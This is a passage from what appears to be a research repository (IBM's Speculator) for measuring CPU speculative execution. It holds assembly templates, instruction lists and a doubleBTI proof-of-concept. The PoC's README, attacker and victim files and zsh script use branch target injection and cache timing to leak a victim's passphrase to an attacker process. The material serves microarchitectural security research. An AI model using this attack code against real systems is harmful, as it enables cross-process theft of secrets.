[lea_array+rax*2]", 36 | "lea rax, [lea_array+rax*2]", 37 | "lea rax, [lea_array+rax*2]", 38 | "lea rax, [lea_array+rax*2]", 39 | "lea rax, [lea_array+rax*2]", 40 | "lea rax, [lea_array+rax*2]", 41 | "lea rax, [lea_array+rax*2]", 42 | "lea rax, [lea_array+rax*2]", 43 | "lea rax, [lea_array+rax*2]", 44 | "lea rax, [lea_array+rax*2]", 45 | "lea rax, [lea_array+rax*2]", 46 | "lea rax, [lea_array+rax*2]", 47 | "lea rax, [lea_array+rax*2]", 48 | "lea rax, [lea_array+rax*2]", 49 | "lea rax, [lea_array+rax*2]", 50 | "lea rax, [lea_array+rax*2]", 51 | "lea rax, [lea_array+rax*2]", 52 | "lea rax, [lea_array+rax*2]", 53 | "lea rax, [lea_array+rax*2]", 54 | "lea rax, [lea_array+rax*2]", 55 | "lea rax, [lea_array+rax*2]", 56 | "lea rax, [lea_array+rax*2]", 57 | "lea rax, [lea_array+rax*2]", 58 | "lea rax, [lea_array+rax*2]", 59 | "lea rax, [lea_array+rax*2]", 60 | "lea rax, [lea_array+rax*2]", 61 | "lea rax, [lea_array+rax*2]", 62 | "lea rax, [lea_array+rax*2]", 63 | "lea rax, [lea_array+rax*2]", 64 | "lea rax, [lea_array+rax*2]", 65 | "lea rax, [lea_array+rax*2]", 66 | "lea rax, [lea_array+rax*2]", 67 | "lea rax, [lea_array+rax*2]", 68 | "lea rax, [lea_array+rax*2]", 69 | "lea rax, [lea_array+rax*2]", 70 | "lea rax, [lea_array+rax*2]", 71 | "lea rax, [lea_array+rax*2]", 72 | "lea rax, [lea_array+rax*2]", 73 | "lea rax, [lea_array+rax*2]", 74 | "lea rax, [lea_array+rax*2]", 75 | "lea rax, [lea_array+rax*2]", 76 | "lea rax, [lea_array+rax*2]", 77 | "lea rax, [lea_array+rax*2]", 78 | "lea rax, [lea_array+rax*2]", 79 | "lea rax, [lea_array+rax*2]", 80 | "lea rax, [lea_array+rax*2]", 81 | "lea rax, [lea_array+rax*2]", 82 | "lea rax, [lea_array+rax*2]", 83 | "lea rax, [lea_array+rax*2]", 84 | "lea rax, [lea_array+rax*2]", 85 | "lea rax, [lea_array+rax*2]", 86 | "lea rax, [lea_array+rax*2]", 87 | "lea rax, [lea_array+rax*2]", 88 | "lea rax, [lea_array+rax*2]", 89 | "lea rax, [lea_array+rax*2]", 90 | "lea rax, [lea_array+rax*2]", 91 | "lea rax, [lea_array+rax*2]", 92 | "lea rax, [lea_array+rax*2]", 93 | "lea rax, [lea_array+rax*2]", 94 | "lea rax, [lea_array+rax*2]", 95 | "lea rax, [lea_array+rax*2]", 96 | "lea rax, [lea_array+rax*2]", 97 | "lea rax, [lea_array+rax*2]", 98 | "lea rax, [lea_array+rax*2]", 99 | "lea rax, [lea_array+rax*2]", 100 | "lea rax, [lea_array+rax*2]", 101 | "lea rax, [lea_array+rax*2]", 102 | "lea rax, [lea_array+rax*2]", 103 | "lea rax, [lea_array+rax*2]", 104 | "lea rax, [lea_array+rax*2]", 105 | "lea rax, [lea_array+rax*2]", 106 | "lea rax, [lea_array+rax*2]", 107 | "lea rax, [lea_array+rax*2]", 108 | "lea rax, [lea_array+rax*2]", 109 | "lea rax, [lea_array+rax*2]", 110 | "lea rax, [lea_array+rax*2]", 111 | "lea rax, [lea_array+rax*2]", 112 | "lea rax, [lea_array+rax*2]", 113 | "lea rax, [lea_array+rax*2]", 114 | "lea rax, [lea_array+rax*2]", 115 | "lea rax, [lea_array+rax*2]", 116 | "lea rax, [lea_array+rax*2]", 117 | "lea rax, [lea_array+rax*2]", 118 | "lea rax, [lea_array+rax*2]", 119 | "lea rax, [lea_array+rax*2]", 120 | "lea rax, [lea_array+rax*2]", 121 | "lea rax, [lea_array+rax*2]", 122 | "lea rax, [lea_array+rax*2]", 123 | "lea rax, [lea_array+rax*2]", 124 | "lea rax, [lea_array+rax*2]", 125 | "lea rax, [lea_array+rax*2]", 126 | "lea rax, [lea_array+rax*2]", 127 | "lea rax, [lea_array+rax*2]", 128 | "lea rax, [lea_array+rax*2]", 129 | "lea rax, [lea_array+rax*2]", 130 | "lea rax, [lea_array+rax*2]", 131 | "lea rax, [lea_array+rax*2]", 132 | "lea rax, [lea_array+rax*2]", 133 | "lea rax, [lea_array+rax*2]", 134 | "lea rax, [lea_array+rax*2]", 135 | "lea rax, [lea_array+rax*2]", 136 | "lea rax, [lea_array+rax*2]", 137 | "lea rax, [lea_array+rax*2]", 138 | "lea rax, [lea_array+rax*2]", 139 | "lea rax, [lea_array+rax*2]", 140 | "lea rax, [lea_array+rax*2]", 141 | "lea rax, [lea_array+rax*2]", 142 | "lea rax, [lea_array+rax*2]", 143 | "lea rax, [lea_array+rax*2]", 144 | "lea rax, [lea_array+rax*2]", 145 | "lea rax, [lea_array+rax*2]", 146 | "lea rax, [lea_array+rax*2]", 147 | "lea rax, [lea_array+rax*2]", 148 | "lea rax, [lea_array+rax*2]", 149 | "lea rax, [lea_array+rax*2]", 150 | "lea rax, [lea_array+rax*2]", 151 | "lea rax, [lea_array+rax*2]", 152 | "lea rax, [lea_array+rax*2]", 153 | "lea rax, [lea_array+rax*2]", 154 | "lea rax, [lea_array+rax*2]", 155 | "lea rax, [lea_array+rax*2]", 156 | "lea rax, [lea_array+rax*2]", 157 | "lea rax, [lea_array+rax*2]", 158 | "lea rax, [lea_array+rax*2]", 159 | "lea rax, [lea_array+rax*2]", 160 | "lea rax, [lea_array+rax*2]", 161 | "lea rax, [lea_array+rax*2]", 162 | "lea rax, [lea_array+rax*2]", 163 | "lea rax, [lea_array+rax*2]", 164 | "lea rax, [lea_array+rax*2]", 165 | "lea rax, [lea_array+rax*2]", 166 | "lea rax, [lea_array+rax*2]", 167 | "lea rax, [lea_array+rax*2]", 168 | "lea rax, [lea_array+rax*2]", 169 | "lea rax, [lea_array+rax*2]", 170 | "lea rax, [lea_array+rax*2]", 171 | "lea rax, [lea_array+rax*2]", 172 | "lea rax, [lea_array+rax*2]", 173 | "lea rax, [lea_array+rax*2]", 174 | "lea rax, [lea_array+rax*2]", 175 | "lea rax, [lea_array+rax*2]", 176 | "lea rax, [lea_array+rax*2]", 177 | "lea rax, [lea_array+rax*2]", 178 | "lea rax, [lea_array+rax*2]", 179 | "lea rax, [lea_array+rax*2]", 180 | "lea rax, [lea_array+rax*2]", 181 | "lea rax, [lea_array+rax*2]", 182 | "lea rax, [lea_array+rax*2]", 183 | "lea rax, [lea_array+rax*2]", 184 | "lea rax, [lea_array+rax*2]", 185 | "lea rax, [lea_array+rax*2]", 186 | "lea rax, [lea_array+rax*2]", 187 | "lea rax, [lea_array+rax*2]", 188 | "lea rax, [lea_array+rax*2]", 189 | "lea rax, [lea_array+rax*2]", 190 | "lea rax, [lea_array+rax*2]", 191 | "lea rax, [lea_array+rax*2]", 192 | "lea rax, [lea_array+rax*2]", 193 | "lea rax, [lea_array+rax*2]", 194 | "lea rax, [lea_array+rax*2]", 195 | "lea rax, [lea_array+rax*2]", 196 | "lea rax, [lea_array+rax*2]", 197 | "lea rax, [lea_array+rax*2]", 198 | "lea rax, [lea_array+rax*2]", 199 | "lea rax, [lea_array+rax*2]", 200 | "lea rax, [lea_array+rax*2]", 201 | "lea rax, [lea_array+rax*2]", 202 | "lea rax, [lea_array+rax*2]", 203 | "lea rax, [lea_array+rax*2]", 204 | "lea rax, [lea_array+rax*2]", 205 | "lea rax, [lea_array+rax*2]", 206 | "lea rax, [lea_array+rax*2]", 207 | "lea rax, [lea_array+rax*2]", 208 | "lea rax, [lea_array+rax*2]", 209 | "lea rax, [lea_array+rax*2]", 210 | "lea rax, [lea_array+rax*2]", 211 | "lea rax, [lea_array+rax*2]", 212 | "lea rax, [lea_array+rax*2]", 213 | "lea rax, [lea_array+rax*2]", 214 | "lea rax, [lea_array+rax*2]", 215 | "lea rax, [lea_array+rax*2]", 216 | "lea rax, [lea_array+rax*2]", 217 | "lea rax, [lea_array+rax*2]", 218 | "lea rax, [lea_array+rax*2]", 219 | "lea rax, [lea_array+rax*2]", 220 | "lea rax, [lea_array+rax*2]", 221 | "lea rax, [lea_array+rax*2]", 222 | "lea rax, [lea_array+rax*2]", 223 | "lea rax, [lea_array+rax*2]", 224 | "lea rax, [lea_array+rax*2]", 225 | "lea rax, [lea_array+rax*2]", 226 | "lea rax, [lea_array+rax*2]", 227 | "lea rax, [lea_array+rax*2]", 228 | "lea rax, [lea_array+rax*2]", 229 | "lea rax, [lea_array+rax*2]", 230 | "lea rax, [lea_array+rax*2]", 231 | "lea rax, [lea_array+rax*2]", 232 | "lea rax, [lea_array+rax*2]", 233 | "lea rax, [lea_array+rax*2]", 234 | "lea rax, [lea_array+rax*2]", 235 | "lea rax, [lea_array+rax*2]", 236 | "lea rax, [lea_array+rax*2]", 237 | "lea rax, [lea_array+rax*2]", 238 | "lea rax, [lea_array+rax*2]", 239 | "lea rax, [lea_array+rax*2]", 240 | "lea rax, [lea_array+rax*2]", 241 | "lea rax, [lea_array+rax*2]", 242 | "lea rax, [lea_array+rax*2]", 243 | "lea rax, [lea_array+rax*2]", 244 | "lea rax, [lea_array+rax*2]", 245 | "lea rax, [lea_array+rax*2]", 246 | "lea rax, [lea_array+rax*2]", 247 | "lea rax, [lea_array+rax*2]", 248 | "lea rax, [lea_array+rax*2]", 249 | "lea rax, [lea_array+rax*2]", 250 | "lea rax, [lea_array+rax*2]", 251 | "lea rax, [lea_array+rax*2]", 252 | "lea rax, [lea_array+rax*2]", 253 | "lea rax, [lea_array+rax*2]", 254 | "lea rax, [lea_array+rax*2]", 255 | "lea rax, [lea_array+rax*2]", 256 | "lea rax, [lea_array+rax*2]", 257 | "lea rax, [lea_array+rax*2]", 258 | "lea rax, [lea_array+rax*2]", 259 | "lea rax, [lea_array+rax*2]", 260 | "lea rax, [lea_array+rax*2]", 261 | "lea rax, [lea_array+rax*2]", 262 | "lea rax, [lea_array+rax*2]", 263 | "lea rax, [lea_array+rax*2]", 264 | "lea rax, [lea_array+rax*2]", 265 | "lea rax, [lea_array+rax*2]", 266 | "lea rax, [lea_array+rax*2]", 267 | "lea rax, [lea_array+rax*2]", 268 | "lea rax, [lea_array+rax*2]", 269 | "lea rax, [lea_array+rax*2]", 270 | "lea rax, [lea_array+rax*2]", 271 | "lea rax, [lea_array+rax*2]", 272 | "lea rax, [lea_array+rax*2]", 273 | "lea rax, [lea_array+rax*2]", 274 | "lea rax, [lea_array+rax*2]", 275 | "lea rax, [lea_array+rax*2]", 276 | "lea rax, [lea_array+rax*2]", 277 | "lea rax, [lea_array+rax*2]", 278 | "lea rax, [lea_array+rax*2]", 279 | "lea rax, [lea_array+rax*2]", 280 | "lea rax, [lea_array+rax*2]", 281 | "lea rax, [lea_array+rax*2]", 282 | "lea rax, [lea_array+rax*2]", 283 | "lea rax, [lea_array+rax*2]", 284 | "lea rax, [lea_array+rax*2]", 285 | "lea rax, [lea_array+rax*2]", 286 | "lea rax, [lea_array+rax*2]", 287 | "lea rax, [lea_array+rax*2]", 288 | "lea rax, [lea_array+rax*2]", 289 | "lea rax, [lea_array+rax*2]", 290 | "lea rax, [lea_array+rax*2]", 291 | "lea rax, [lea_array+rax*2]", 292 | "lea rax, [lea_array+rax*2]" 293 | ] 294 | } 295 | -------------------------------------------------------------------------------- /examples/corr_issued_and_exec/corr_issued_and_exec_slow_lea.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | warmup_cnt: dd 1 21 | fill: times 128 db 0 22 | 23 | warmup_cnt_fake: dd 1 24 | fill2: times 128 db 0 25 | 26 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 27 | fd: dq 0 28 | lea_array times 128 db 0 29 | offset: dq 0 30 | val: dq 0 31 | len: equ $-val 32 | array: times 128 db 0 33 | ;##### DATA STARTS HERE ######## 34 | 35 | ;##### DATA ENDS HERE ######## 36 | 37 | section .text 38 | global perf_test_entry:function 39 | global snippet:function 40 | 41 | perf_test_entry: 42 | push rbp 43 | mov rbp, rsp 44 | sub rsp, len 45 | 46 | check_pinning VICTIM_PROCESS 47 | msr_open 48 | msr_seek 49 | .data: 50 | clflush [warmup_cnt] 51 | mov eax, 0 52 | cpuid 53 | lfence 54 | reset_counter 55 | start_counter 56 | cmp DWORD[warmup_cnt], 12 57 | je .else 58 | ;##### SNIPPET STARTS HERE ###### 59 | 60 | ;##### SNIPPET ENDS HERE ###### 61 | .else: 62 | lfence 63 | stop_counter 64 | 65 | inc DWORD[warmup_cnt] 66 | cmp DWORD[warmup_cnt], 13 67 | jl .data 68 | 69 | msr_close 70 | exit 0 71 | -------------------------------------------------------------------------------- /examples/doubleBTI/README.md: -------------------------------------------------------------------------------- 1 | # DoubleBTI attack using ReverseBTI gadget 2 | 3 | ## Run attack 4 | First we need to add the attacker and the victim to the tests under speculator. 5 | 6 | ``` 7 | ln -s $SPEC_H/examples/doubleBTI/dbl* $SPEC_H/tests/ 8 | 9 | cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I -G "Ninja" 10 | 11 | ninja -C $SPEC_B install 12 | ``` 13 | 14 | The we can run the script that launch the attack. Here, the script uses 15 | Speculator as orchestrator only without PMC. The data used to leak the string 16 | are output by the attacker in /tmp/attacker.output and they contain the time 17 | information for each of the array cells. 18 | 19 | ``` 20 | zsh doubleBTI_POC.zsh 21 | ``` 22 | 23 | ## Brief attack description 24 | This test is the proof of concept implementation of a doubleBTI attack in which 25 | a reverseBTI gadget is used to leak data from a victim to an attacker using the 26 | Branch Predictor. 27 | 28 | In this POC the attacker can lure the victim to process a specific character `C` of a string. 29 | Using a first BTI attack, we can have the victim to execute a second indirect call 30 | based on a `fun(C)` value. The outcome of `fun(C)` is 256 possible values that 31 | should be mappable virtual addresses. 32 | 33 | At this point, the attacker can perform this second indirect call 34 | trained by victim using the `fun(C)` value and observe where speculative execution land 35 | towards. `fun(C)` is known to the attacker which will map each one of the possible 36 | 256 values in its address space and instrument with array accesses that will 37 | give us the knowledge of which C was computed by victim at the time of the call. 38 | 39 | The array for the final data access is all handled by the attacker which can 40 | accurately evict each cell from memory. This guarantee a very clear signal 41 | whenever the attack complete successfully (e.g. all the indirect calls are 42 | speculative executed by victim). 43 | 44 | ## ReverseBTI gadget 45 | This gadget is represented by this second indirect call that the victim executes 46 | which train the BP for the attacker. In our doubleBTI POC, the gadget follows the 47 | speculative control flow hijacked performed by a BTI attack. 48 | 49 | Though, the ReverseBTI gadget it is not limited to BTI speculative control flow 50 | hijacks but can be used in combination of any speculative control flow hijacks 51 | technique. For instance, speculative return hijack can be used in combination 52 | with ReverseBTI too. 53 | 54 | More details available about this in our WOOT 2019 paper referenced in README.md 55 | 56 | -------------------------------------------------------------------------------- /examples/doubleBTI/dblbti_attacker.c: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include 16 | #include 17 | 18 | #include 19 | 20 | void set_write_code() { 21 | long end; 22 | long start; 23 | char line[10000]; 24 | char name[10000]; 25 | char dummy[10000]; 26 | long x; 27 | 28 | FILE *fp = fopen("/proc/self/maps", "r"); 29 | 30 | if (fp == NULL) 31 | exit(-1); 32 | 33 | while (fgets(line, 1000, fp) != NULL) { 34 | sscanf(line, "%lx-%lx %*s %*s %*s %*s %s", &start, &end, name); 35 | 36 | if (start == 0x400000 || start == 0x601000) { 37 | printf ("changing start %lx of size %lx", start, end-start); 38 | int ret = mprotect ((void*) start, (size_t) end - start, 39 | PROT_WRITE | PROT_READ | PROT_EXEC); 40 | if (ret != 0) { 41 | printf ("ERROR\n"); 42 | } 43 | } 44 | } 45 | } 46 | 47 | #define SIZE 256 48 | void print_val(int* val) { 49 | FILE *f = fopen("/tmp/attacker.output", "a"); 50 | int i; 51 | for (i = 0; i < SIZE; ++i) { 52 | fprintf (f, "%d) %d\n", i, *val); 53 | val++; 54 | } 55 | fprintf (f, "\n"); 56 | fclose(f); 57 | } 58 | -------------------------------------------------------------------------------- /examples/doubleBTI/dblbti_victim.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | %define BASE 0x10000000 20 | 21 | section .data 22 | passphrase: db 'Y0U_W1ll_N0t_G3t_M3!',0 23 | secret_len: equ $-passphrase 24 | input: dq 0 25 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 26 | fd: dq 0 27 | val: dq 0 28 | len: equ $-val 29 | array: resb 2048 30 | secret: db 0 31 | addr: dq 0 32 | align 1024 33 | addr2: dq 0 34 | align 1024 35 | ;##### DATA STARTS HERE ######## 36 | 37 | ;##### DATA ENDS HERE ######## 38 | 39 | section .text 40 | global perf_test_entry:function 41 | global snippet:function 42 | global gadget:function 43 | global secret:function 44 | global correct:function 45 | global indirect:function 46 | 47 | extern usleep 48 | extern atoi 49 | extern set_write_code 50 | extern print_val 51 | extern no_arg_err 52 | extern out_of_bound 53 | 54 | bti_call: 55 | call [addr] 56 | ret 57 | 58 | perf_test_entry: 59 | push rbp 60 | mov rbp, rsp 61 | mov rax, [rsp+8] ; argc 62 | cmp rax, 2 63 | je .cont 64 | call no_arg_err 65 | .cont: 66 | mov rax, [rsp+24] ; argv[1] 67 | mov QWORD[input], rax 68 | check_pinning VICTIM_PROCESS;# ATTACK_PROCESS 69 | msr_open 70 | msr_seek 71 | .atoi: 72 | mov rax, QWORD[input] 73 | mov rdi, rax 74 | call atoi 75 | cmp rax, secret_len 76 | jle .cont2 77 | call out_of_bound 78 | .cont2 79 | add rax, passphrase 80 | mov al, BYTE[rax] 81 | mov BYTE[secret], al 82 | xor rax, rax 83 | mov ax, WORD[secret] 84 | shl eax, 16 85 | add rax, BASE 86 | mov QWORD[addr2], rax 87 | mov rdi, rax 88 | mov rsi, rax 89 | call print_val 90 | ;mov QWORD[addr2], verify <- re-direct to verify to test reverseBTI with PMC 91 | align 512 92 | 93 | victim: 94 | jmpnext256 95 | jmpnext256 96 | mov QWORD[addr], correct 97 | clflush[addr] 98 | lfence 99 | 100 | reset_counter 101 | start_counter 102 | .call: 103 | call bti_call 104 | 105 | stop_counter 106 | 107 | msr_close 108 | exit 0 109 | 110 | align 1024 111 | gadget: 112 | nop 113 | call [addr2] 114 | ret 115 | lfence 116 | 117 | 118 | align 1024 119 | verify: 120 | mov DWORD[array], eax 121 | mov DWORD[array+4], edx 122 | movq xmm0, QWORD[array] 123 | ret 124 | 125 | align 1024 126 | correct: 127 | ret 128 | 129 | -------------------------------------------------------------------------------- /examples/doubleBTI/dblbti_victim.c: -------------------------------------------------------------------------------- 1 | // Copyright 2021 IBM Corporation 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | // See the License for the specific language governing permissions and 13 | // limitations under the License. 14 | 15 | #include 16 | #include 17 | 18 | #include 19 | 20 | void set_write_code() { 21 | char line[1000]; 22 | char name[40]; 23 | long start; 24 | long end; 25 | 26 | FILE *fp = fopen("/proc/self/maps", "r"); 27 | 28 | if (fp == NULL) 29 | exit(-1); 30 | 31 | while (fgets(line, 1000, fp) != NULL) { 32 | sscanf(line, "%lx-%lx %*s %*s %*s %*d %s", &start, 33 | &end, name); 34 | /*printf ("considering start %lx\n", start);*/ 35 | if (start == 0x400000 || start == 0x601000) { 36 | /*printf ("changing start %lx of size %lx", start, end-start);*/ 37 | int ret = mprotect ((void*) start, (size_t) end - start, 38 | PROT_WRITE | PROT_READ | PROT_EXEC); 39 | if (ret != 0) { 40 | printf ("ERROR\n"); 41 | } 42 | } 43 | } 44 | } 45 | 46 | void print_val(int val, int acc_time) { 47 | FILE *f = fopen("/tmp/victim.output", "w"); 48 | fprintf (f,"sectret based address %x\n", val); 49 | fclose(f); 50 | 51 | } 52 | 53 | void no_arg_err() { 54 | printf ("Error, no parameters or wrong parameters given to program\n"); 55 | exit(-1); 56 | } 57 | 58 | void out_of_bound() { 59 | printf ("The value provided is out of bound\n"); 60 | exit(-1); 61 | } 62 | -------------------------------------------------------------------------------- /examples/doubleBTI/doubleBTI_POC.zsh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | # Copyright 2021 IBM Corporation 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | if (( ${+SPEC_I} )) then 17 | echo -e "\e[33mSPEC_I is set to ${SPEC_I}\e[39m" 18 | else 19 | echo -e "\e[31mERROR: SPEC_I must be properly set\e[39m" 20 | exit 21 | fi 22 | 23 | echo -e "\e[33mCreating doublebti_res \e[39m" 24 | mkdir -p /tmp/doublebti_res 25 | 26 | echo -e "\e[33mCleaning doublebti_res \e[39m" 27 | setopt +o nomatch 28 | rm -rf /tmp/doublebti_res/* 29 | 30 | echo -e "\e[33mRemoving previous generated attacker.out from tmp \e[39m" 31 | rm -f /tmp/attacker.output 32 | 33 | for j ({0..19}) do 34 | $SPEC_I/speculator_mon -v $SPEC_I/tests/dblbti_victim/dblbti_victim \ 35 | -a $SPEC_I/tests/dblbti_attacker/dblbti_attacker \ 36 | -o $SPEC_I/results/speculator.output \ 37 | --vpar $j \ 38 | -r 100 \ 39 | -c $SPEC_I/speculator.json \ 40 | -m 41 | 42 | for x ({0..256}); do 43 | cat /tmp/attacker.output | grep "^$x)" | cut -d " " -f 2 | awk '{if($1==$1+0 && $1<80)print $1}' | wc -l 44 | done | nl -nln --starting-line-number=0 > /tmp/tmp.res 45 | 46 | cat /tmp/tmp.res | awk '{if ($2>0) printf "\033[32m%c\033[0m ", $1}' 47 | 48 | cat /tmp/tmp.res | awk '{sum+=$2;} END{if (sum==0) printf("\033[31mX\033[0m ")}' 49 | 50 | mv /tmp/attacker.output /tmp/doublebti_res/attacker_$j.output 51 | done 52 | -------------------------------------------------------------------------------- /examples/mpx/mpx.asm: -------------------------------------------------------------------------------- 1 | i; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "signals.inc" 18 | %include "pmc.inc" 19 | 20 | %macro setup_mpx 0 21 | ; read cpu state first 22 | mov eax, DWORD(0x18) ; lower 32bit of mask 23 | mov edx, 0 ; higher 32bit of mask 24 | mov rdi, xstate 25 | xrstor64 [rdi] 26 | ; set mpx params in memory 27 | mov rdx, 0x10 28 | mov [xstate+0x200], rdx ; xsave_buf->xsave_hdr.xstate_bv = 0x10; 29 | mov rdx, 0x1 ; 1 << MPX_ENABLE_BIT_NO 30 | or rdx, 0x2 ; 1 << BNDPRESERVE_BIT_NO 31 | mov [xstate+0x400], rdx ; // enable mpx xsave_buf->bndcsr.cfg_reg_u = ... 32 | xor rdx, rdx 33 | mov [xstate+0x408], rdx ; xsave_buf->bndcsr.status_reg = 0; 34 | ; write cpu state 35 | mov eax, DWORD(0x10) ; lower 32bit of mask we want to write 36 | mov edx, 0 ; higher 32bit 37 | mov rdi, xstate 38 | xrstor64 [rdi] 39 | %endmacro 40 | 41 | ; sys_rt_sigaction - alter an action taken by a process 42 | ; @sig: signal to be sent 43 | ; @act: new sigaction 44 | ; @oact: used to save the previous sigaction 45 | ; @sigsetsize: size of sigset_t type 46 | 47 | %macro setup_signal_handler 0 48 | mov QWORD [sigaction.sa_handler], handler 49 | mov QWORD [sigaction.sa_restorer], restorer 50 | mov eax, SA_RESTART | SA_RESTORER | SA_SIGINFO 51 | mov DWORD [sigaction.sa_flags], eax 52 | mov rax, SYS_RT_SIGACTION ; system call number 53 | mov rdi, SIGSEGV ; signal number 54 | lea rsi, [sigaction] ; sigaction struct 55 | xor rdx, rdx ; save previous sigaction (no) 56 | mov r10, NSIG_WORDS ; sigsetsize 57 | syscall 58 | cmp eax, 0 59 | %endmacro 60 | 61 | %macro print 2 62 | mov rax, SYS_WRITE 63 | mov rdi, 1 ; stdout 64 | mov rsi, %1 65 | mov rdx, %2 ;len 66 | syscall 67 | %endmacro 68 | 69 | section .data 70 | warmup_cnt: dq 1 71 | 72 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 73 | msg_bounds: db "mpx bounds", 0xA, 0 74 | fd: dq 0 75 | val: dq 0 76 | len: equ $-val 77 | array: times 40 db 0 78 | ALIGN 64 79 | xstate: times 0x1000 db 0 80 | SIGACTION sigaction 81 | ;##### DATA STARTS HERE ######## 82 | 83 | ;##### DATA ENDS HERE ######## 84 | 85 | section .bss 86 | 87 | section .text 88 | global perf_test_entry:function 89 | 90 | perf_test_entry: 91 | push rbp 92 | mov rbp, rsp 93 | sub rsp, len 94 | 95 | check_pinning VICTIM_PROCESS 96 | ; signal handler 97 | setup_signal_handler 98 | jne .exit 99 | 100 | msr_open 101 | msr_seek 102 | 103 | ; mpx setup 104 | setup_mpx 105 | ; setup bounds 106 | lea rax, [array] 107 | bndmk bnd1, [rax+10] ; make bounds 108 | 109 | .data: 110 | clflush [warmup_cnt] 111 | lfence 112 | reset_counter 113 | start_counter 114 | 115 | ; mpx stuff below 116 | lea r11, [array] 117 | add r11, [warmup_cnt] 118 | bndcl bnd1, [r11] ; check lower 119 | bndcu bnd1, [r11] ; check upper 120 | ;##### SNIPPET STARTS HERE ###### 121 | 122 | ;##### SNIPPET ENDS HERE ###### 123 | lea r8, [rel msg_bounds] 124 | 125 | .else: 126 | lfence 127 | stop_counter 128 | 129 | inc QWORD[warmup_cnt] 130 | cmp QWORD[warmup_cnt], 13 131 | jl .data 132 | .exit: 133 | msr_close 134 | exit 0 135 | 136 | ; rdi=signum, rsi=siginfo_t*, rdx=sigcontext* 137 | handler: 138 | ; trap number should be 5 for TRAP_BR 139 | mov r10,[rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.trapno] 140 | cmp r10, 5 141 | jne .exit 142 | push rdx 143 | print msg_bounds, 12 144 | ; set RIP to continue after the fault 145 | pop rdx 146 | mov r10, QWORD(perf_test_entry.else) 147 | mov [rdx+UCONTEXT_STRUC.uc_mcontext+SIGCONTEXT_STRUC.rip], r10 148 | .exit: 149 | ret 150 | 151 | restorer: 152 | mov rax, SYS_RT_SIGRETURN 153 | syscall 154 | -------------------------------------------------------------------------------- /examples/mpx/spec_length.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | 9 | "fnop", 10 | "fnop", 11 | "fnop", 12 | "fnop", 13 | "fnop", 14 | "fnop", 15 | "fnop", 16 | "fnop", 17 | "fnop", 18 | "fnop", 19 | "fnop", 20 | "fnop", 21 | "fnop", 22 | "fnop", 23 | "fnop", 24 | "fnop", 25 | "fnop", 26 | "fnop", 27 | "fnop", 28 | "fnop", 29 | "fnop", 30 | "fnop", 31 | "fnop", 32 | "fnop", 33 | "fnop", 34 | "fnop", 35 | "fnop", 36 | "fnop", 37 | "fnop", 38 | "fnop", 39 | "fnop", 40 | "fnop", 41 | "fnop", 42 | "fnop", 43 | "fnop", 44 | "fnop", 45 | "fnop", 46 